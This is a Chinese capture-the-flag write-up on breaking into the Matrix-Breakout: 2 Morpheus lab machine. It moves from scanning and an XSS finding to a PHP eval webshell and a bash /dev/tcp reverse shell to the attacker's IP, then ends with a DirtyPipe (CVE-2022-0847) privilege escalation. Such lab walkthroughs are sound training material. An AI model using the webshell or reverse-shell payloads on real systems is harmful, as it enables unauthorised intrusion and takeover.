MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透
2023-6-2 16:53:0 Author: xz.aliyun.com(查看原文) 阅读量:28 收藏

  • 信息收集
  • 确定靶机IP
    arp-scan -l
    确定靶机ip为:192.168.88.130。

  • 扫描开放端口
    nmap -p- 192.168.88.130
    开放了端口:22、80、81

    80端口是一个网页,没什么可用信息。

    81端口是一个登录窗口,有点像Tomcat登录窗口,试了几个常见的弱口令没登进去。

  • 扫描目录
    使用Kali自带的dirbuster,目录字典是用的是directory-list-2.3-small.txt,发现了如下目录。

  • 渗透过程

目录一一打开,在graffiti.php页面发现了有个提交窗口。

提交内容会在页面上显示,试了xss,果然可以弹窗。

尝试写入webshell,先试试<?php eval(@$_POST['cmd']); ?>,写进去没回显没法连接。抓包看,发现是写入到一个叫graffiti.txt

可以通过URLhttp://192.168.88.130/graffiti.txt访问。

那么我们可以尝试写入到可执行文件test.php中。

使用webshell管理工具蚁剑连接,连接成功。

在根目录下发现FLAG.txt

内容大概意思是有个用户Cypher, 还有张图片/.cypher-neo.png可能有用。

先把图片下载下来。

继续翻文件,果然在home文件下发现了Cypher用户文件夹,但是没有权限。

另一个用户文件夹thrinity可以打开,但是不知道有啥用。

上传反弹shell到test.php,开启监听,再访问test.php,在Kali里获得webshell。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.129/9999 0>&1'");?>

也可以直接使用蚁剑的终端。

使用susudo -i提权失败。

再来研究研究图片cypher-neo.png,使用Kali自带工具图片分析工具binwalk,发现图片含有一个zip包。

提取文件后,得到两个文件,一个为空,另一个打开都不知道咋打开,遂弃。

再看看有啥用户,除了home下提示的两个也没别的了。

再看下系统内核版本,发现是5.x,可以使用DirtyPipe漏洞(CVE-2022-0847)进行提权。

下载exp,https://gitcode.net/mirrors/r1is/CVE-2022-0847/-/blob/main/Dirty-Pipe.sh, 在蚁剑中上传。

设置Dirty-Pipe.sh权限后,再执行,直接提权成功。

在根目录下找到第二个flag,至此渗透完毕!


文章来源: https://xz.aliyun.com/t/12583
如有侵权请联系:admin#unsafe.sh